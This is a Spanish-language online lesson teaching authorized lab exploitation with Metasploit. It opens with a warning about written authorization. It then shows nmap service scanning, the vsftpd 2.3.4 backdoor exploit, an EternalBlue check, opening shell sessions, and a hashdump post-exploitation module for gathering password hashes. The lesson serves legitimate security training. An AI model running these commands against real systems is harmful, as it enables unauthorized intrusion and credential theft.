Explotación de una vulnerabilidad conocida
Utilice un módulo de exploit contra un objetivo vulnerable en un laboratorio e interprete la salida de la sesión.
Explotación de una vulnerabilidad conocida es una lección gratuita de Cyber Security Academy en CoddyKit. Esta es la lección 2 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cyber Security Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cyber Security Academy incluye 4 lecciones en total.
La ética y la autorización son lo primero
La explotación solo es legal contra sistemas que le pertenecen o cuya evaluación ha sido autorizada explícitamente por escrito. Todos los ejemplos de esta lección están destinados a entornos de laboratorio autorizados. La explotación no autorizada constituye un delito.
Recomendación para configurar el laboratorio
Utilice máquinas virtuales intencionadamente vulnerables: Metasploitable2/3, DVWA, máquinas de VulnHub o HackTheBox/TryHackMe para practicar legalmente. Nunca realice pruebas en sistemas de producción o del mundo real sin un documento de alcance firmado.
# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/
# Or use VulnHub
# https://www.vulnhub.com/
# Network: host-only adapter (isolated)Reconocimiento antes de la explotación
Realice siempre una enumeración antes de explotar. Conozca la versión exacta del servicio, el sistema operativo y el contexto antes de seleccionar un exploit. Una versión incorrecta implica que el exploit fallará o que el sistema puede bloquearse.
sudo nmap -sV -O 192.168.1.100
# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploitSelección del exploit adecuado
Busque por nombre y versión del servicio. Dé preferencia a los módulos clasificados como Excellent o Great. Lea info para confirmar que la plataforma y el intervalo de versiones del objetivo coinciden.
msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent
msf6 > info exploit/unix/ftp/vsftpd_234_backdoorConfiguración y ejecución del exploit
Establezca RHOSTS (objetivo remoto), LHOST (su IP para las conexiones inversas) y LPORT (puerto de escucha), seleccione un payload y ejecútelo. Observe si se crea una sesión o aparecen mensajes de error.
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run
# [*] Command shell session 1 openedInterpretación de los resultados
Un exploit ejecutado correctamente abre una sesión. Los exploits fallidos muestran mensajes de error: conexión rechazada (el puerto no está abierto), exploit fallido (versión incorrecta) o no se creó ninguna sesión (el payload no pudo conectarse de vuelta).
# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened
# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was createdInteracción con una sesión
Después de la explotación, interactúe con la sesión mediante sessions -i . Las sesiones básicas de shell de comandos proporcionan un terminal; las sesiones de Meterpreter ofrecen una API completa.
msf6 > sessions # list all sessions
msf6 > sessions -i 1 # interact with session 1
# Once inside:
id
whoami
ifconfig
uname -aTrabajo en segundo plano y varias sesiones
Pulse Ctrl+Z para enviar una sesión a segundo plano y volver a msfconsole. Esto le permite gestionar varias sesiones o ejecutar módulos de pos-explotación contra una sesión específica.
# Background active session
Ctrl+Z
# List sessions
msf6 > sessions
# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > runComando check
Muchos módulos de exploit implementan un comando check que comprueba si el objetivo es vulnerable sin explotarlo realmente. Ejecute siempre check primero, si está disponible.
msf6 exploit(ms17_010_eternalblue) > check
# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.Consideraciones sobre la fiabilidad de los exploits
Los exploits pueden bloquear servicios, activar alertas o dejar registros. En evaluaciones de producción, programe los exploits durante periodos de poco tráfico, tenga preparado un plan de reversión y confirme que existen copias de seguridad antes de ejecutar cualquier acción destructiva.
Documentación de la explotación
Registre la fecha y hora, la IP y el puerto del objetivo, el módulo de exploit utilizado, el número de CVE, el payload utilizado, la sesión obtenida y las evidencias (una captura de pantalla o la salida del terminal). Esta es la prueba de la vulnerabilidad que incluirá en el informe.
Comprobación rápida
¿Qué hace el comando "check" de Metasploit?
Resumen: Explotación de vulnerabilidades
La explotación ética sigue un flujo claro: obtenga autorización por escrito, realice una enumeración cuidadosa, seleccione el exploit correspondiente, lea la información del módulo, ejecute check primero si está disponible, ejecute el exploit y documente todo. Nunca explote sistemas sin autorización: la capacidad técnica y el límite ético son inseparables.
Preguntas frecuentes
¿La lección «Explotación de una vulnerabilidad conocida» es gratis?
Sí — el texto completo de «Explotación de una vulnerabilidad conocida» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cyber Security Academy, actualiza a CoddyKit PRO. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué aprenderé en «Explotación de una vulnerabilidad conocida»?
Utilice un módulo de exploit contra un objetivo vulnerable en un laboratorio e interprete la salida de la sesión. Practicas Cyber Security Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.
¿Necesito experiencia previa para empezar Cyber Security Academy?
No se requiere experiencia previa. Cyber Security Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 2 de 4.
¿Cuánto tiempo toma la lección «Explotación de una vulnerabilidad conocida»?
La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.
¿Puedo escribir y ejecutar código en esta lección de Cyber Security Academy?
Sí. Cada lección de Cyber Security Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.
Todas las lecciones de este curso
- Arquitectura de Metasploit y msfconsole
- Explotación de una vulnerabilidad conocida
- Payloads: con etapas y sin etapas, Meterpreter
- Postexplotación: pivotar y persistir